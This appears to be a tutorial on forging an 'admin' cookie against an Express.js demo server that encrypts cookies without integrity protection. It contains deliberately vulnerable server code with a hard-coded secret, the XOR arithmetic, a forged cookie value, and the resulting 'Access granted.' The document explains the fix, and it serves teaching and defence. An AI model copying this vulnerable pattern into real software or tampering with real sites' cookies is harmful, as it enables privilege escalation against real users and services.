Let's imagine a website with the following source code:
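const express = require('express');
const cookieParser = require('cookie-parser');
const cookieEncrypter = require('cookie-encrypter');
const app = express();

// Demo server: the "role" cookie is encrypted by cookie-encrypter but carries
// no integrity check, so a modified ciphertext still decrypts to attacker-chosen
// bytes without any error. The secret is hard-coded for the example only.
const COOKIE_SECRET = "NicePasswordHereItIsAGoodSecret!";
app.use(cookieParser(COOKIE_SECRET));
app.use(cookieEncrypter(COOKIE_SECRET));

// Issues an encrypted "role=guest" cookie. It is not signed (no `signed: true`),
// so cookie-parser's HMAC never covers it and tampering goes unnoticed.
app.get('/login', (req, res) => {
  res.cookie("role", "guest");
  res.send("logged in as guest");
});

// Grants access purely on the decrypted cookie value.
// Strict equality is used because cookie-parser may decode `j:`-prefixed cookies
// into non-string values, which `==` would coerce before comparing. This does not
// defend against ciphertext tampering; that requires a signed cookie
// (`signed: true` and reading `req.signedCookies.role`) or authenticated encryption.
app.get("/admin", (req, res) => {
  console.log(req.cookies);
  if (req.cookies.role === "admin") {
    res.send("Access granted.");
  } else {
    res.send("Access denied.");
  }
});

app.listen(80);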
We load /login and get a cookie as guest:
e:87c3aa62cf38214f7c25d66eacb4c95a:9df91af30fafe915f3ef71069653d4c1
We now have to XOR the IV, which is the first hex field of the cookie: 87c3aa62cf38214f7c25d66eacb4c95a
We XOR it with "guest" and with "admin" to perform the bit-flipping attack; here is a link to help.
The two hex strings are the hex encodings of "guest" and "admin", each followed by null bytes so that the XOR is applied only to the leading bytes rather than repeated across the rest of the IV. Here is a link to get them.
So we get the following crafted cookie:
e:81d2a278d538214f7c25d66eacb4c95a:9df91af30fafe915f3ef71069653d4c1
And now loading /admin we get: Access granted. This works because the cookie is encrypted but not integrity-protected: nothing on the server detects that the IV was altered, so the flipped bits land directly in the decrypted "role" value.